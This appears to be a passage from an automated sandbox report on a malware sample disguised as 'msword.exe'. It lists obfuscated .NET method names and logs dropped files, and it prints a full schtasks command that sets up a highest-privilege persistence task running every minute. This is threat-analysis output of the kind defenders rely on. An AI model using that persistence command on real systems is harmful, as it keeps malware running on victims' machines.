Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, jK7sv5002wQ0ek2EAr2o3wDDr4zAqW3R8PWFXkbJnQ5bRJF2FaTd1HiqunhxNLSvUdXoUWshj0JKIvOrMSMX03PhbVGgcwKVlt.csHigh entropy of concatenated method names: 'aDuXyAG8aQdkmCKKcoSTDaQkSh3Lr9FW1mndJAMiWmdnCD3bXprWowpsyYpgl7E0fGCoHdU6Pgu6zBCFOUyW1b1wmnKdrZOXx2', 'c5hjhE8YclmwANlIaxPmdgQdXiZ8qP6wF8bgkTUCjJuUfQwlIrP0Pak1T03vdavsEQG2osMRiQJR4rr5XYu4rZG3NxCV1a7YbI', 'CoWg7aPAgVrl2FVw5Syl3brvLcotyljlHmU91gF7YnE0boVu5dkVAZbMw01X06tXpzGyIpVckzBVSbyVIOiwf20AO8DnIdsVNY', 'e0PYBydFMt8DnephhR4vus0GGJRu1e8zUnbnvZjfHJ3kOiwBh7iBJMQRVFLVtqn9Ug0vE6uffiJueOBXEptcThKOKxTNhce2tr', 'Zbn2IuXmau0snpGGqEaeoVlQJerE96ZcMIW1rdmGRJHbhVBDO44Q7u6BbTrbuhxk4vBjBLtHKaZYKrlsXt8syS46d7U8Ve7J8j', 'xu5wzjLZxBCMUkbcxp5yOAxqFGy08IQlSVRBlokqGfoaginc1IGs4R8LVfl4p13LuZtRVGAhqR0vZ5JJc8ONthFlA8HcNISDue', 'ybLQfT2E1hjmYQ0uuyDhzc88OgyoTwgghSRDfaFF4OTFHkDRNLgnGfIRgHojcmuYV7YFxZOfYCuGcKQzq8a96FHRJq5AXNZe9b', 'AwIRfUYTARcqi15uLXUMkaPscqhpaFhtAg6gxwDBfSHzwxnobRpLyAHn0QEVYjP3QboUu1VNb61rv0LWBhIiqF78abwL2YriTQ', 'XEDoxDfOqrBSibfLZSZ8urEWWZbiyGOGuvByjJckTqU9vyMG5dpGdqOF30ivMGsrCmsYHCA2ZxIIV4GuGPtvGB3DEHxQxYC1ki', 'tQ9Lx2Mu4k8YNXyBvLLrIqUqeMAsxNFtIWgZf6q8ikYwTzkSisJkJrnIpkjFKcAoSngpjfFpm3dZZknEHcYNvqv9ycLuXLUOJR'
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.csHigh entropy of concatenated method names: 'vXdf9ZPrvXFWYv2hxRTtS7AEXTJ9svcN0eoh4hc0', 'P505pCN11lSWhnf9gHPksn10tlFBOrh0ECc9Va7Q', '_6bY2mlnFaDa8LwvoEjU23KDxigGMfDv0nszHIPbU', 'YJBjj4okhK13xcRLrNFQDmsKxBnN8joceqAP7wHC', 'z4p8DS4ndL0xeKTmqjq7Q8vXHZ2t8T4uEeN3PNZD', 'vICaiqgh6677uEdpdQIXVaadQfN2LO5HZUOvHXDB', '_6mrt0Qlvq2dbP8rDVSimAk4YCOhdGT5cdFvO0lM1', 'TMZys9XTxWUHNZI06Gsmlc3ukmkJZfuGGpkzNXjg', 'zoTxfTebRVp4vNGfjlxjGZ5gau', 'sUDtYB42h3OD6FHvkTg4MYobAp'
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, uZTleKS4UURYcsq7mO9baxmplLW1iTvON57H4pxXBvSyFchTtcNVpsJ0sd.csHigh entropy of concatenated method names: 'dE7eNZjPCKSFbJ4L1s9Tcj1QqcEXzfRpzHaeCIJ8HET8uLJEB7zqN3jzEt', 'x48mzhDKmz4eFFGvdvBrpqSCFy4BMU9t29jxbPz2gUhYS4PYNC6d8', 'I9OFs2D76FeDIO8LDzmWrArLFzVX22sN545Bzhf0PoNhYCJriihKW', 'jc8HGdJiIGW9oPUUxhEe2i1jWXYCDlr0Mjn0U82zFjt9Djm8axQFI', 'sJHbZaEfowbCVdpE4xO5QU9NzrfCdMjh5HmH8gjbfAMps8bdnDc2I'
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, 7gTDCf4xE7WmGxVMtz697rJgDE.csHigh entropy of concatenated method names: 'ZadOaNBcG4N4viyUpuOPSoqF8o', 'EwEHAMKgvfvedSSGQmctMAyVYv', '_627lHQUAfXsAJVEiUMZZMdwezd', 'o6fCujRw1jXK3Jm0hLG9F8RD56', 'lYSvDonlRcJyYu5sh2lATZ1jKa', 'g6qaK2qIBKEPcFTOZ7kEBk5Ei6', 'nQXhnNk4vf0A236w3ABpZ88Fp9', 'sNUH8I1ZijvkPdRDM2BGrtNInA', 's8ngsmu75Dlx6ZoGw16SCFgRda', 'kC1MhMZZz9NH2wf7jzC9O4V3tv'
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, GDIAnXTRSIb3FrAeKFF4FT1RGJoZkrNqr0qUx7gyE9Qg1MvFfwWHEjyFTQDyybvmlttzzBOFwfUM16Ttlz2BgYoVLdgdJ5SuKV.csHigh entropy of concatenated method names: 'lHZ0KWPr0B6Rl1tLxp8r8NxWhRQuPehrN7G4wTG9nB7QwU1XESom2uby56vljhbTTrHNHEpRlLoyYRfwNectzElZ7ii8n8C6My', 'smlfkwkCDIrZom9hvPNdXvonH9YEubaQk1DyBUD7Ty4w2JG7D0fuFzHxx6Ps6LsrI7hfDYNaPUbZl5gTixIldUelAwdUAnmsEI', 'qdpYDELZuNOUfTgqhiHsFuyBxbHzKe4bAzCvVuhMBoR5VvL4ikL2NC1aU5anS6jr2pLHflYHHSfxojf9HfWuJ4EHsg1OhjmDFf', '_0lZNePy9Tbtc0yjcn32MlP7oxilKr2EnkMwxhoz5ykB1zLu8PAarnMAB10BMhIQLCiLHGvqnIypudeffo8blVS7ZHCjFdizOIQ', 'yEzci1XE3GEDSibDpnNa93tYueTNBXm1VrWkjqc97frIgTZDb3xod7s91jiWdpV9yA4nYUz7SWjHf4iWGttq3zgRtUq4IQEI8k', 'jygpotUgp9pzTZzzT4sKWeOLmca9kOdLNrUq2lrw4zeFOATR8COp2NSrvDhhrSZpBwxbaleowP7TdNEeCrMfbFzKgphDT', 'HeBtxARF0Rs2eAjLnwxbyin4fwm5qywmfduOdHWnds5kEpdFtzKN0cH6RXlPMX0yEqxARwOUMok9ldrAwnmuDRp8hLF4t', 'BcA4qEdHtphTwJZQYzoBw90Hy9OPw8E0Ktkm1sCtnwgDKf6vfvMo4ta7K4OioXUBhTi054oohY9C2HuZGMCDv7k17hZu7', 'M7aenwjHjk9JiJDczc7BjdJH2n6DgPcomBr4Lf2Pc30huX7VoXL72R1MZ11fMwp5lPonLwar23SiwDURtmdTwUTaatRQF', '_8JSTjQVi8sVubpzYHGcHffTzfAeU9qXzi2gYJpGof8yaEkoR4b1m3AY9mWYuG4ciFEVwE9aQmTk6Hpt8VDMCWxdxuGu4R'
Source: 30.2.msword.exe.17fd2fbcdd8.2.raw.unpack, Loz4LoeB21CBWtx3CqnXcyrEpn.csHigh entropy of concatenated method names: 'HFpEuaVwFNNBS8xfELBfV1Z81B', 'V5Uar9TpEWsg2gsgrjDRZnDPimINTpaIsZOFWDvS8sriqP93gUzFZ', 'VL4RaxpTZkb7djsGiwyWNYHreCpC6MIliT90CRzFwG689jdOrYR7v', 'gBaTReFqFXmnUzMVEtEIorCRxolhx0jKqP8g0pveWIXu929qV5x8l', 'F490LaDZbfMNJ5f76e5iAaIKAIo7A1L3GDhDdljNVpAoJK34vSHQp'
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, HF1cn3oBFDjIf9Ucsywh6a5iI8V0pozpwe3RAgXqiO9wnyCDKb6GN2mg6NPNzne98o.csHigh entropy of concatenated method names: 'qyZ3CE7hVVJtSO5aY1J8cbwaIN0MohakF8a5e8BirUe81SYq09sRwRZlFVftfZyNKGdFWkIlXdAtG3ooQbhIlwwfov97h', 'IKsjzKlkT9eYAuezAgCLNvSrxFt7tDXX0F0BQYBOoREfOBU6h9ZvyI5RWRLgutHT1weDErbFRnewZo4iOva4rwmGkEMA8', 'PYBgJqAj042EQcpCoGjCqHbYCV6UmUXhZups9Vh4WWNu7MQS2ngpY21cbLt6ZuGQX7J23nTu1f53230baKK81vxmcyTfd', 'tsNF8bvU09aPIX5UCTFTxy8FRwZu5T07Jyx4pNpEq4qaGhsBfWO40wfhTewjmmamkRqzTNPvsSUEVPJCLI6DN8pIHP5Qn'
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, fiXbb6qxSDfJSJW89nNh911NffhUuhLKAwbl3dP2J1OIzEBUf5Ug7cjbzCtXDs7EfJmLolcXjv3yfawPyRFLQSCi4t.csHigh entropy of concatenated method names: 'Vhhl4B4pgI3r6xkvow9zxZ98z8ygFJVfY6dWcwS6CtLrnnlVh68JpCPwsqnTFuhTjosJgcrYdOwhMAQDwgbr78fo0J', '_8p8IR2QOMYSzVVEMkJjwfJNLdZpV27W2gojpCalPmvExGjjufRFKRwV0CJKkhfrkk1zA16EbyCrq', 'zygF5aq0vk4qT0xtB2oiKDQKpDUUavZDsOt818ORmJCPbHRDJgTWyMSgEQcaL4LT5vGGsDPbZQrs', 'U0hye4Hi6F18fVFBfMjdGp6aXfupDfvRc6518JvqZGPtApTAetOYr', 'S993i8J4XlitM73FpIiuhDJ5zQbluxlqOVKk6QSvwpoUPjNnhk3JE', 'HCTo97ycrneNb88dqwqWiqNjFznvbmGochhWjMvLZshvvbOWnbNcV', 'bneYGi6IZYEJb0N43ktcnaOzFrZB1H5td1GTTGyah9Mjjf8VNBHW9', '_0uwgQVyJ1PPp4nEew1WaQMGpmNCLJKCGtIlpyp3CZ14PbYl5STF1h', 'Haqwdws7E6bDKLgY6LiRJr9YanE8OfjwPuVzZCKhHGAj9ZDOZfDI8', 'x8deMnzz0czUMDJq6W2lmeD3X51YoneSAaH1Pahqur5sAMjVS8Lbn'
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, JzG6cq6Fw4ycgPnrgr5ZkfXJSNRpnzKeJ7h9sesNJjccm0xuHnyVojDBptZw6Isx2J.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'drKSSLqgIMzcJtsjxWTyA6GMI7Ja5vUlMlDKhwdTsSdYQempavarhIE4AkEfwPAzNU9ex0c0tCQWaPMXJRkLl5GGvgfbS', 'q2bBc989rQkYix2KWrhaBiuAxNgvhmbWlj2TK9HTajVuTAdQNCGNaDOcS3fiBsievrr8ek17Q0cylmzilUfFXx3McArg0', 'fktyHA6lIj6pVKL9xjWKvMCYCFrMEiYQzwWPPxFFu9zyPG5nlFJbxsyZcPZRg3zLu20BwyYx3hUlo3EePD6pzx6sHwmNm', 'OYfLr5OYXwtCqz1urV6RFlSQCT4doiXaRCQquPCukiOuYcN3Aey1CmkL4IjFgw8KkmgYE2zSNHu3Hq6JLR5GpGsv1lAHT'
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, 5mxApoJhgBT3F8fxU6U0Ho1e8369aU5P5OSst2rb0PPD8xhIuddLllo0ET.csHigh entropy of concatenated method names: 'WPQARxRKv0JSvJxITVtYFuxriVqyiHmjBWDeft3tdb23RDer7C298YNFri', 'JxlbcjmQlJCScW9eTkqgzU2x4z0zT6fYv6Tjh9ILPyhNxUT5X4ORblzL79', 'Kg7SM6J4ttibMB2AJHfs1n1gkh6rvarY3IDTUt2Ei2L5OfwcZTTwNQo0t1', 'fjfNPZQRmPcdmBQ7axA8IqpKyib92WqBQD3WUgm4eQmwrfGvEAXnZCuZDF', 'FxBxHsDnOic82qq88h5QDQt8agiCuMnk8tITR8nYj2OMaDiSrjrbrrXGPdPR6mLqk52xnlW1Jn8j0XAhNSbsQMQ5kJ', 'YmTV8e8EHjyBfUndeTD6wm8AWaS7hwPh5vZzuqKlcqOpglYQFvvpM2BIQpEWCAIrR4ebK1C2QSBKLTghLDoKNQ5Wtk', 'ax7nATg4XO48Gg7vDaxRrQRvwAxIasksMYytTOkjmmUDV75KEqVrCk9O8Ggm5rZH97uEo7xvWic8B1HxCYwkm0amTw', 'nsZfYwroJtZO7QpgP5pJL6aCQoLTmOwOyFIV8cSMAUmIAncWt8xdNMS8IXuWn3vemJWbmtVajybpEOShx7uFtcLzGh', 'dGIm1Ey6zZBqreKxQEDnRl0dlL1YgHPFyRG1TV71NJ1g3MUit2YOZOIXJwUqTOzNqYoGCBZndjq9gYANdGDF0uuhJa', '_2q4mu1lT8xp06kUcc3O1AOjHPEcUjB449CtN1nbCcvEDUI1LryskD6Q6C5PGz9YKxZ0rDPiZyIpJ7ZewnGlzScZQuq'
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, jK7sv5002wQ0ek2EAr2o3wDDr4zAqW3R8PWFXkbJnQ5bRJF2FaTd1HiqunhxNLSvUdXoUWshj0JKIvOrMSMX03PhbVGgcwKVlt.csHigh entropy of concatenated method names: 'aDuXyAG8aQdkmCKKcoSTDaQkSh3Lr9FW1mndJAMiWmdnCD3bXprWowpsyYpgl7E0fGCoHdU6Pgu6zBCFOUyW1b1wmnKdrZOXx2', 'c5hjhE8YclmwANlIaxPmdgQdXiZ8qP6wF8bgkTUCjJuUfQwlIrP0Pak1T03vdavsEQG2osMRiQJR4rr5XYu4rZG3NxCV1a7YbI', 'CoWg7aPAgVrl2FVw5Syl3brvLcotyljlHmU91gF7YnE0boVu5dkVAZbMw01X06tXpzGyIpVckzBVSbyVIOiwf20AO8DnIdsVNY', 'e0PYBydFMt8DnephhR4vus0GGJRu1e8zUnbnvZjfHJ3kOiwBh7iBJMQRVFLVtqn9Ug0vE6uffiJueOBXEptcThKOKxTNhce2tr', 'Zbn2IuXmau0snpGGqEaeoVlQJerE96ZcMIW1rdmGRJHbhVBDO44Q7u6BbTrbuhxk4vBjBLtHKaZYKrlsXt8syS46d7U8Ve7J8j', 'xu5wzjLZxBCMUkbcxp5yOAxqFGy08IQlSVRBlokqGfoaginc1IGs4R8LVfl4p13LuZtRVGAhqR0vZ5JJc8ONthFlA8HcNISDue', 'ybLQfT2E1hjmYQ0uuyDhzc88OgyoTwgghSRDfaFF4OTFHkDRNLgnGfIRgHojcmuYV7YFxZOfYCuGcKQzq8a96FHRJq5AXNZe9b', 'AwIRfUYTARcqi15uLXUMkaPscqhpaFhtAg6gxwDBfSHzwxnobRpLyAHn0QEVYjP3QboUu1VNb61rv0LWBhIiqF78abwL2YriTQ', 'XEDoxDfOqrBSibfLZSZ8urEWWZbiyGOGuvByjJckTqU9vyMG5dpGdqOF30ivMGsrCmsYHCA2ZxIIV4GuGPtvGB3DEHxQxYC1ki', 'tQ9Lx2Mu4k8YNXyBvLLrIqUqeMAsxNFtIWgZf6q8ikYwTzkSisJkJrnIpkjFKcAoSngpjfFpm3dZZknEHcYNvqv9ycLuXLUOJR'
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, AhT96k9dDzjijSE8trywFkmBtNFcq2aTcE8Zsr2k.csHigh entropy of concatenated method names: 'vXdf9ZPrvXFWYv2hxRTtS7AEXTJ9svcN0eoh4hc0', 'P505pCN11lSWhnf9gHPksn10tlFBOrh0ECc9Va7Q', '_6bY2mlnFaDa8LwvoEjU23KDxigGMfDv0nszHIPbU', 'YJBjj4okhK13xcRLrNFQDmsKxBnN8joceqAP7wHC', 'z4p8DS4ndL0xeKTmqjq7Q8vXHZ2t8T4uEeN3PNZD', 'vICaiqgh6677uEdpdQIXVaadQfN2LO5HZUOvHXDB', '_6mrt0Qlvq2dbP8rDVSimAk4YCOhdGT5cdFvO0lM1', 'TMZys9XTxWUHNZI06Gsmlc3ukmkJZfuGGpkzNXjg', 'zoTxfTebRVp4vNGfjlxjGZ5gau', 'sUDtYB42h3OD6FHvkTg4MYobAp'
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, uZTleKS4UURYcsq7mO9baxmplLW1iTvON57H4pxXBvSyFchTtcNVpsJ0sd.csHigh entropy of concatenated method names: 'dE7eNZjPCKSFbJ4L1s9Tcj1QqcEXzfRpzHaeCIJ8HET8uLJEB7zqN3jzEt', 'x48mzhDKmz4eFFGvdvBrpqSCFy4BMU9t29jxbPz2gUhYS4PYNC6d8', 'I9OFs2D76FeDIO8LDzmWrArLFzVX22sN545Bzhf0PoNhYCJriihKW', 'jc8HGdJiIGW9oPUUxhEe2i1jWXYCDlr0Mjn0U82zFjt9Djm8axQFI', 'sJHbZaEfowbCVdpE4xO5QU9NzrfCdMjh5HmH8gjbfAMps8bdnDc2I'
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, 7gTDCf4xE7WmGxVMtz697rJgDE.csHigh entropy of concatenated method names: 'ZadOaNBcG4N4viyUpuOPSoqF8o', 'EwEHAMKgvfvedSSGQmctMAyVYv', '_627lHQUAfXsAJVEiUMZZMdwezd', 'o6fCujRw1jXK3Jm0hLG9F8RD56', 'lYSvDonlRcJyYu5sh2lATZ1jKa', 'g6qaK2qIBKEPcFTOZ7kEBk5Ei6', 'nQXhnNk4vf0A236w3ABpZ88Fp9', 'sNUH8I1ZijvkPdRDM2BGrtNInA', 's8ngsmu75Dlx6ZoGw16SCFgRda', 'kC1MhMZZz9NH2wf7jzC9O4V3tv'
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, GDIAnXTRSIb3FrAeKFF4FT1RGJoZkrNqr0qUx7gyE9Qg1MvFfwWHEjyFTQDyybvmlttzzBOFwfUM16Ttlz2BgYoVLdgdJ5SuKV.csHigh entropy of concatenated method names: 'lHZ0KWPr0B6Rl1tLxp8r8NxWhRQuPehrN7G4wTG9nB7QwU1XESom2uby56vljhbTTrHNHEpRlLoyYRfwNectzElZ7ii8n8C6My', 'smlfkwkCDIrZom9hvPNdXvonH9YEubaQk1DyBUD7Ty4w2JG7D0fuFzHxx6Ps6LsrI7hfDYNaPUbZl5gTixIldUelAwdUAnmsEI', 'qdpYDELZuNOUfTgqhiHsFuyBxbHzKe4bAzCvVuhMBoR5VvL4ikL2NC1aU5anS6jr2pLHflYHHSfxojf9HfWuJ4EHsg1OhjmDFf', '_0lZNePy9Tbtc0yjcn32MlP7oxilKr2EnkMwxhoz5ykB1zLu8PAarnMAB10BMhIQLCiLHGvqnIypudeffo8blVS7ZHCjFdizOIQ', 'yEzci1XE3GEDSibDpnNa93tYueTNBXm1VrWkjqc97frIgTZDb3xod7s91jiWdpV9yA4nYUz7SWjHf4iWGttq3zgRtUq4IQEI8k', 'jygpotUgp9pzTZzzT4sKWeOLmca9kOdLNrUq2lrw4zeFOATR8COp2NSrvDhhrSZpBwxbaleowP7TdNEeCrMfbFzKgphDT', 'HeBtxARF0Rs2eAjLnwxbyin4fwm5qywmfduOdHWnds5kEpdFtzKN0cH6RXlPMX0yEqxARwOUMok9ldrAwnmuDRp8hLF4t', 'BcA4qEdHtphTwJZQYzoBw90Hy9OPw8E0Ktkm1sCtnwgDKf6vfvMo4ta7K4OioXUBhTi054oohY9C2HuZGMCDv7k17hZu7', 'M7aenwjHjk9JiJDczc7BjdJH2n6DgPcomBr4Lf2Pc30huX7VoXL72R1MZ11fMwp5lPonLwar23SiwDURtmdTwUTaatRQF', '_8JSTjQVi8sVubpzYHGcHffTzfAeU9qXzi2gYJpGof8yaEkoR4b1m3AY9mWYuG4ciFEVwE9aQmTk6Hpt8VDMCWxdxuGu4R'
Source: 30.2.msword.exe.17fd2eb0000.1.raw.unpack, Loz4LoeB21CBWtx3CqnXcyrEpn.csHigh entropy of concatenated method names: 'HFpEuaVwFNNBS8xfELBfV1Z81B', 'V5Uar9TpEWsg2gsgrjDRZnDPimINTpaIsZOFWDvS8sriqP93gUzFZ', 'VL4RaxpTZkb7djsGiwyWNYHreCpC6MIliT90CRzFwG689jdOrYR7v', 'gBaTReFqFXmnUzMVEtEIorCRxolhx0jKqP8g0pveWIXu929qV5x8l', 'F490LaDZbfMNJ5f76e5iAaIKAIo7A1L3GDhDdljNVpAoJK34vSHQp'

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\msword\msword.comJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\msword\msword.comJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comFile created: C:\Users\user\AppData\Roaming\msword.exeJump to dropped file

Boot Survival

barindex
Source: C:\Users\user\AppData\Local\Temp\msword\msword.comProcess created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msword" /tr "C:\Users\user\AppData\Roaming\msword.exe
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
